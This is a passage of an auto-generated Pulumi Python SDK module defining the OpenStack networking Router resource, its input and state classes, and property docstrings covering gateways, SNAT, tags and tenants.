@external_fixed_ips.setter
def external_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]):
pulumi.set(self, "external_fixed_ips", value)
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> Optional[pulumi.Input[str]]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@external_gateway.setter
def external_gateway(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_gateway", value)
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@external_network_id.setter
def external_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_network_id", value)
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@external_subnet_ids.setter
def external_subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_subnet_ids", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> Optional[pulumi.Input['RouterVendorOptionsArgs']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
@vendor_options.setter
def vendor_options(self, value: Optional[pulumi.Input['RouterVendorOptionsArgs']]):
pulumi.set(self, "vendor_options", value)
@pulumi.input_type
class _RouterState:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input['RouterVendorOptionsArgs']] = None):
"""
Input properties used for looking up and filtering Router resources.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the router, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input['RouterVendorOptionsArgs'] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if all_tags is not None:
pulumi.set(__self__, "all_tags", all_tags)
if availability_zone_hints is not None:
pulumi.set(__self__, "availability_zone_hints", availability_zone_hints)
if description is not None:
pulumi.set(__self__, "description", description)
if distributed is not None:
pulumi.set(__self__, "distributed", distributed)
if enable_snat is not None:
pulumi.set(__self__, "enable_snat", enable_snat)
if external_fixed_ips is not None:
pulumi.set(__self__, "external_fixed_ips", external_fixed_ips)
if external_gateway is not None:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
if external_gateway is not None:
pulumi.set(__self__, "external_gateway", external_gateway)
if external_network_id is not None:
pulumi.set(__self__, "external_network_id", external_network_id)
if external_subnet_ids is not None:
pulumi.set(__self__, "external_subnet_ids", external_subnet_ids)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
if vendor_options is not None:
pulumi.set(__self__, "vendor_options", vendor_options)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of tags assigned on the router, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@all_tags.setter
def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_tags", value)
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@availability_zone_hints.setter
def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zone_hints", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def distributed(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@distributed.setter
def distributed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "distributed", value)
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@enable_snat.setter
def enable_snat(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_snat", value)
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
@external_fixed_ips.setter
def external_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterExternalFixedIpArgs']]]]):
pulumi.set(self, "external_fixed_ips", value)
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> Optional[pulumi.Input[str]]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@external_gateway.setter
def external_gateway(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_gateway", value)
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@external_network_id.setter
def external_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_network_id", value)
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@external_subnet_ids.setter
def external_subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_subnet_ids", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> Optional[pulumi.Input['RouterVendorOptionsArgs']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
@vendor_options.setter
def vendor_options(self, value: Optional[pulumi.Input['RouterVendorOptionsArgs']]):
pulumi.set(self, "vendor_options", value)
class Router(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None,
__props__=None):
"""
Manages a V2 router resource within OpenStack.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
router1 = openstack.networking.Router("router1",
admin_state_up=True,
external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f")
```
## Import
Routers can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/router:Router router_1 014395cd-89fc-4c9b-96b7-13d1ee79dad2
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[RouterArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V2 router resource within OpenStack.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
router1 = openstack.networking.Router("router1",
admin_state_up=True,
external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f")
```
## Import
Routers can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/router:Router router_1 014395cd-89fc-4c9b-96b7-13d1ee79dad2
```
:param str resource_name: The name of the resource.
:param RouterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RouterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RouterArgs.__new__(RouterArgs)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["availability_zone_hints"] = availability_zone_hints
__props__.__dict__["description"] = description
__props__.__dict__["distributed"] = distributed
__props__.__dict__["enable_snat"] = enable_snat
__props__.__dict__["external_fixed_ips"] = external_fixed_ips
if external_gateway is not None and not opts.urn:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
__props__.__dict__["external_gateway"] = external_gateway
__props__.__dict__["external_network_id"] = external_network_id
__props__.__dict__["external_subnet_ids"] = external_subnet_ids
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
__props__.__dict__["vendor_options"] = vendor_options
__props__.__dict__["all_tags"] = None
super(Router, __self__).__init__(
'openstack:networking/router:Router',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None) -> 'Router':
"""
Get an existing Router resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the router, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RouterState.__new__(_RouterState)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["all_tags"] = all_tags
__props__.__dict__["availability_zone_hints"] = availability_zone_hints
__props__.__dict__["description"] = description
__props__.__dict__["distributed"] = distributed
__props__.__dict__["enable_snat"] = enable_snat
__props__.__dict__["external_fixed_ips"] = external_fixed_ips
__props__.__dict__["external_gateway"] = external_gateway
__props__.__dict__["external_network_id"] = external_network_id
__props__.__dict__["external_subnet_ids"] = external_subnet_ids
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
__props__.__dict__["vendor_options"] = vendor_options
return Router(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> pulumi.Output[bool]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> pulumi.Output[Sequence[str]]:
"""
The collection of tags assigned on the router, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> pulumi.Output[Sequence[str]]:
"""
An availability zone is used to make
network resources highly available. Used for resources with high availability
so that they are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def distributed(self) -> pulumi.Output[bool]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> pulumi.Output[bool]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> pulumi.Output[Sequence['outputs.RouterExternalFixedIp']]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> pulumi.Output[str]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> pulumi.Output[str]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of external subnet IDs to try over
each to obtain a fixed IP for the router. If a subnet ID in a list has
exhausted floating IP pool, the next subnet ID will be tried. This argument is
used only during the router creation and allows to set only one external fixed
IP. Conflicts with an `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The owner of the floating IP. Required if admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> pulumi.Output[Optional['outputs.RouterVendorOptions']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
| 49.276268
| 160
| 0.656532
| 6,716
| 54,401
| 5.15411
| 0.042287
| 0.083576
| 0.076296
| 0.041889
| 0.949068
| 0.943637
| 0.93835
| 0.933584
| 0.93211
| 0.921508
| 0
| 0.002274
| 0.256337
| 54,401
| 1,103
